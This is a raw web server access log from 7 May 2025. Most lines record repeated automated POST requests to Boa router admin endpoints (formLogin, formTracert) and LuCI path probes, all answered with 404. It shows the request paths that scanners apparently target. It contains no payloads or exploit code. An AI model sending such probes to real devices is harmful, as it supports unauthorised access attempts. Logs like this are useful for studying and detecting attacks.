161.248.238.13 - - [07/May/2025:06:35:20 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:06:35:52 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:06:36:00 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:06:36:17 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:06:36:17 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:37:23 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:38:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:06:38:37 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:06:39:19 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:39:31 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:39:59 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:40:40 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:40:52 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:06:42:19 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:06:42:30 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:43:10 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:44:24 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:06:44:48 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:45:21 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:45:44 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:06:45:57 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:46:10 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:47:37 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:06:48:09 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:06:48:45 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:48:54 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:49:42 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:50:27 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:06:51:23 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:06:51:23 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:51:35 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
175.203.210.112 - - [07/May/2025:06:52:10 +0530] "GET / HTTP/1.0" 200 4270 "-" "curl/7.88.1"
45.134.225.133 - - [07/May/2025:06:52:15 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.142.182 - - [07/May/2025:06:52:18 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.142.182 - - [07/May/2025:06:52:18 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.142.182 - - [07/May/2025:06:52:19 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
45.134.225.133 - - [07/May/2025:06:52:51 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:53:37 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.7 - - [07/May/2025:06:54:13 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
95.214.54.4 - - [07/May/2025:06:54:33 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:06:54:42 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:06:55:07 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:55:20 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:55:38 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:57:10 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:57:42 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:06:58:05 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:58:51 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:06:59:05 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:00:36 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:01:36 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:07:02:32 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:03:21 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:03:51 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.137.188 - - [07/May/2025:07:03:57 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [07/May/2025:07:03:57 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [07/May/2025:07:03:57 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
45.134.225.133 - - [07/May/2025:07:04:05 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:07:04:11 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
154.81.156.34 - - [07/May/2025:07:04:51 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
176.65.137.188 - - [07/May/2025:07:05:54 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [07/May/2025:07:05:54 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [07/May/2025:07:05:55 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
45.134.225.133 - - [07/May/2025:07:06:15 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:06:55 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:07:10 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:07:40 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:08:43 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:07:08:43 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:08:52 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
80.82.77.202 - - [07/May/2025:07:09:04 +0530] "GET / HTTP/1.0" 200 4270 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.19 Safari/537.36 Edg/77.0.235.9"
45.134.225.133 - - [07/May/2025:07:09:14 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:07:10:18 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:07:11:31 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
141.98.11.27 - - [07/May/2025:07:12:53 +0530] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 224 "-" "-"
45.134.225.133 - - [07/May/2025:07:13:35 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:07:13:50 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
161.248.238.13 - - [07/May/2025:07:14:15 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:14:44 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:15:00 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:15:44 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:16:41 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:07:16:49 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:07:17:20 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
172.236.228.245 - - [07/May/2025:07:17:21 +0530] "\x16\x03\x01\x01\n" 400 226 "-" "-"
172.236.228.245 - - [07/May/2025:07:17:21 +0530] "\x16\x03\x01\x01\n" 400 226 "-" "-"
45.134.225.133 - - [07/May/2025:07:17:50 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:18:09 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:19:06 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:07:19:22 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:07:20:00 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:20:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:21:19 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:21:43 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:07:22:35 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:23:42 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
141.98.11.27 - - [07/May/2025:07:23:46 +0530] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 224 "-" "-"
45.134.225.133 - - [07/May/2025:07:23:59 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:24:19 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:24:23 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.35 - - [07/May/2025:07:24:58 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
161.248.238.13 - - [07/May/2025:07:25:11 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:26:15 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:26:15 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:26:35 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:27:01 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:28:02 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:28:43 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:07:29:02 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:29:18 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.142.182 - - [07/May/2025:07:30:22 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:07:30:39 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:31:38 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:07:32:10 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:07:32:43 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:32:48 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:07:33:20 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:07:33:42 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:34:07 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:34:41 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:35:10 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.35 - - [07/May/2025:07:35:10 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.134.225.133 - - [07/May/2025:07:35:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:37:16 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:07:38:06 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:07:38:13 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:39:16 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:07:40:22 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:07:40:38 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
